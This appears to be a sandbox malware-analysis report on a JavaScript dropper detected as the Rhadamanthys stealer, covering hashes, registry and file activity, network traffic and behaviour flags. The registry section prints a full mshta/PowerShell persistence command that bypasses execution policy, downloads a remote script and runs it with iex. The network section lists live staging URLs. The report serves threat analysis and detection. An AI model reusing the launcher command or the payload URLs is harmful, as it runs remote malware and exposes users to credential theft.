File name:	credit.js
Full analysis:	https://app.any.run/tasks/84c2c49a-c894-4707-854d-169ab479bf4e
Verdict:	Malicious activity
Threats:	Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	December 18, 2024, 05:56:59
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	rhadamanthys stealer shellcode
Indicators:
MIME:	text/plain
File info:	ASCII text, with very long lines (65536), with no line terminators
MD5:	6E736FB3A389822243B58FFC5CBA478F
SHA1:	1A1BED473E5490261994DF6DF570A4C5B2604B02
SHA256:	611EDED9DC38ABE33B6DBF64BEE5B9E9C3DBF331657BCEB0B001B6FDF1F1F830
SSDEEP:	384:JOiJCtCEVgjwACyA2nHNazC6VgDBv1JStEc4zWuNDVSISYO2TGWTHnrz6lEBHJWZ:F2GyA0/ta7SuHiHwdcU6AH6xgi


(PID) Process:	(936) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Operation:	write	Name:	ExecutionPolicy
Value: Bypass
(PID) Process:	(936) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Uplatbookinglt-152
Value: mshta "javascript:nzs=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hootdec.blogspot.com/pepa.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(nzs[2])[nzs[0]](nzs[1], 0, true);close();dis=new ActiveXObject('Scripting.FileSystemObject');dis.DeleteFile(WScript.ScriptFullName);"
(PID) Process:	(2676) RegSvcs.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\SibCode
Operation:	write	Name:	sn3
Value: 7FF2589B20AA7C5BC41D87EED7EB70E0D61947359280A0431BDD0FB8AA5C278A3160BA915C8F70C1B98671AA43117DFEE5357C1C7A5E1782DDC87F012E0FB77F
(PID) Process:	(2996) RegSvcs.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\SibCode
Operation:	write	Name:	sn3
Value: 7FF2589B20AA7C5BC41D87EED7EB70E0D61947359280A0431BDD0FB8AA5C278A3160BA915C8F70C1B98671AA43117DFEE5357C1C7A5E1782DDC87F012E0FB77F
(PID) Process:	(3724) dw20.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
Operation:	write	Name:	ClockTimeSeconds
Value: 7C64626700000000
(PID) Process:	(3724) dw20.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
Operation:	write	Name:	TickCount
Value: B181140000000000
(PID) Process:	(936) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Ubookingl-64
Value: schtasks /run /tn Ubookingl-64

PID	Process	Filename		Type
936	powershell.exe	C:\ProgramData\nippleskulcha\oaisjdnlijasndijasndijasmidjamsjd.~!!@@!!@@!@@!!@@!@@!!@@!!~		—
		MD5:—	SHA256:—
3724	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_b9a731ec57ed9a6b83af3da83c55fc566ac997_00000000_3d654967-abc4-4d97-a536-6c2d28a0ee16\Report.wer		—
		MD5:—	SHA256:—
5032	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdb91b7cbb029f3575443b28fbe755628d6e7e_00000000_c54ac212-f367-418e-88ce-751b9689ed60\Report.wer		—
		MD5:—	SHA256:—
3076	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdb91b7cbb029f3575443b28fbe755628d6e7e_00000000_ccbe48e5-2ee6-44cc-974e-dcd9e9b71480\Report.wer		—
		MD5:—	SHA256:—
2744	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_b9a731ec57ed9a6b83af3da83c55fc566ac997_00000000_105e2af1-8e5e-4396-9ce8-d9f77e46d888\Report.wer		—
		MD5:—	SHA256:—
5032	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E75.tmp.WERInternalMetadata.xml		xml
		MD5:D0D4C50E6FD0538EAD56654146A10A5B	SHA256:3CCE376FC9AADBDB14D9DDF94E9D165D67771EB77F4E8D242434EA34A91D38A2
3076	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EB5.tmp.xml		xml
		MD5:48312D84EE89FEA40EA40FE324A3E1AE	SHA256:0B386E78938543088A260BC9EA3AADF36123488E4DF2E13456F046210B7F1E44
5032	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EB5.tmp.xml		xml
		MD5:D107CA8FD6F37235BA24279C1A030343	SHA256:EA4192DA671A6E0733B4EC958B00295761941AE155F5CC7137017B77306CB7F3
936	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache		binary
		MD5:C904B83F3EB6B36C24B175843EAE2F18	SHA256:AE9C3B418FC314078AEA3B8FE77670BDBD72E127D1DAE886D031A73C2074B64F
3076	dw20.exe	C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E85.tmp.WERInternalMetadata.xml		xml
		MD5:009EC7132A3B076BAC6CE3D3C913EC9F	SHA256:1B6B8EF08CC55766875D2732945303B786FBD649C947F2ADA928698903AFB406

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6072	svchost.exe	GET	200	23.216.77.28:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	23.216.77.28:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6072	svchost.exe	GET	200	2.23.181.156:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	2.23.181.156:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	302	142.250.186.33:443	https://17-dec-hot.blogspot.com/atom.xml	unknown	—	—	—
—	—	GET	302	142.250.186.33:443	https://17-dec-hot.blogspot.com//////nipple.pdf	unknown	html	218 b	whitelisted
—	—	GET	200	185.166.143.48:443	https://bitbucket.org/!api/2.0/snippets/nippleskakulcha/6qB8px/8b1738210ebf2e2e115b26972821816107381552/files/dec.txt	unknown	text	4.23 Mb	shared

PID	Process	IP	Domain	ASN	CN	Reputation
4712	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	192.168.100.255:137	—	—	—	whitelisted
6072	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.21.110.146:443	www.bing.com	AKAMAI-AS	DE	whitelisted
—	—	192.168.100.255:138	—	—	—	whitelisted
—	—	2.21.110.139:443	www.bing.com	AKAMAI-AS	DE	whitelisted
6072	svchost.exe	23.216.77.28:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
4712	MoUsoCoreWorker.exe	23.216.77.28:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
6072	svchost.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59 20.73.194.208	whitelisted
www.bing.com	2.21.110.146 2.21.110.139	whitelisted
google.com	142.250.181.238	whitelisted
crl.microsoft.com	23.216.77.28 23.216.77.42	whitelisted
www.microsoft.com	2.23.181.156	whitelisted
17-dec-hot.blogspot.com	142.250.186.33	whitelisted
bitbucket.org	185.166.143.48 185.166.143.49 185.166.143.50	shared
watson.events.data.microsoft.com	52.168.117.173	whitelisted
self.events.data.microsoft.com	20.42.65.90	whitelisted

General Info

credit.js

6E736FB3A389822243B58FFC5CBA478F

1A1BED473E5490261994DF6DF570A4C5B2604B02

611EDED9DC38ABE33B6DBF64BEE5B9E9C3DBF331657BCEB0B001B6FDF1F1F830

384:JOiJCtCEVgjwACyA2nHNazC6VgDBv1JStEc4zWuNDVSISYO2TGWTHnrz6lEBHJWZ:F2GyA0/ta7SuHiHwdcU6AH6xgi

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Bypass execution policy to execute commands

Changes powershell execution policy (Bypass)

Dynamically loads an assembly (POWERSHELL)

Scans artifacts that could help determine the target

RHADAMANTHYS mutex has been found

RHADAMANTHYS has been detected (YARA)

SUSPICIOUS

PowerShell delay command usage (probably sleep evasion)

Starts POWERSHELL.EXE for commands execution

Gets or sets the security protocol (POWERSHELL)

Converts a specified value to an integer (POWERSHELL)

Writes data into a file (POWERSHELL)

Converts a specified value to a byte (POWERSHELL)

Uses sleep to delay execution (POWERSHELL)

Reads security settings of Internet Explorer

Checks Windows Trust Settings

Reads the date of Windows installation

The process checks if it is being run in the virtual environment

Connects to unusual port

INFO

Disables trace logs

Creates files in the program directory

The process uses the downloaded file

Checks proxy server information

Gets data length (POWERSHELL)

Gets or sets the time when the file was last written to (POWERSHELL)

Uses string replace method (POWERSHELL)

Checks supported languages

Reads the computer name

Reads the machine GUID from the registry

Reads product name

Reads Environment values

Process checks computer location settings

Reads CPU info

Checks if a key exists in the options dictionary (POWERSHELL)

Manual execution by a user

Checks whether the specified file exists (POWERSHELL)

Reads the software policy settings

Script raised an exception (POWERSHELL)

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events